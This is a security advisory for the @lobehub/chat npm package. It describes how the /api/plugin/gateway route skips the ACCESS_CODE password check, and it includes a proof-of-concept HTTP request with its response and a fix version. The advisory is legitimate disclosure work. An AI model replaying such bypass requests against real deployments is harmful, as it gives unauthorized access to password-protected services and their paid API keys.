GHSA-pf55-fj96-xf37

Suggest an improvement
Source
https://github.com/advisories/GHSA-pf55-fj96-xf37
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-pf55-fj96-xf37
Aliases
Related
Published
2024-01-31T18:04:55Z
Modified
2024-01-31T20:25:37Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVSS Calculator
Summary
@lobehub/chat vulnerable to unauthorized access to plugins
Details

Description:

When the application is password-protected (deployed with the ACCESS_CODE option), it is possible to access plugins without proper authorization (without password).

Proof-of-Concept:

Let’s suppose that application has been deployed with following command: sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat Due to the utilization of the ACCESS_CODE, access to the chat is possible only after entering the password:

image

However, it is possible to interact with chat plugins without entering the ACCESS_CODE. Example HTTP request:

POST /api/plugin/gateway HTTP/1.1
Host: localhost:3210
Content-Length: 1276

{"apiName":"checkWeatherUsingGET","arguments":"{\n  \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.","type":"default","version":"1","settings":{"properties":{},"type":"object"}}}

HTTP response:

HTTP/1.1 200 OK
[...]
{"location":{"name":"London","region":"City of London, Greater London","country":"United Kingdom","lat":51.52,"lon":-0.11,"tz_id":"Europe/London","localtime_epoch":1706379026,"localtime":"2024-01-27 18:10"},"current":{"last_updated_epoch":1706378400,"last_updated":"2024-01-27 18:00","temp_c":6,"temp_f":42.8,"is_day":0,"condition":{"text":"Clear","icon":"//cdn.weatherapi.com/weather/64x64/night/113.png","code":1000},"wind_mph":4.3,"wind_kph":6.8,"wind_degree":170,"wind_dir":"S","pressure_mb":1031,"pressure_in":30.45,"precip_mm":0,"precip_in":0,"humidity":81,"cloud":0,"feelslike_c":3.8,"feelslike_f":38.9,"vis_km":10,"vis_miles":6,"uv":1,"gust_mph":9.5,"gust_kph":15.3},"infoLink":"https://weathergpt.vercel.app/London"}

Remediation:

Verify the ACCESS_CODE for HTTP requests to the /api/plugin/: route.

Impact:

Unauthorized access to plugins.

Database specific
{
    "nvd_published_at": "2024-01-31T17:15:39Z",
    "cwe_ids": [
        "CWE-284"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-31T18:04:55Z"
}
References

Affected packages

npm / @lobehub/chat

Package

Name
@lobehub/chat
View open source insights on deps.dev
Purl
pkg:npm/%40lobehub/chat

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.122.4

Database specific

{
    "last_known_affected_version_range": "<= 0.122.3"
}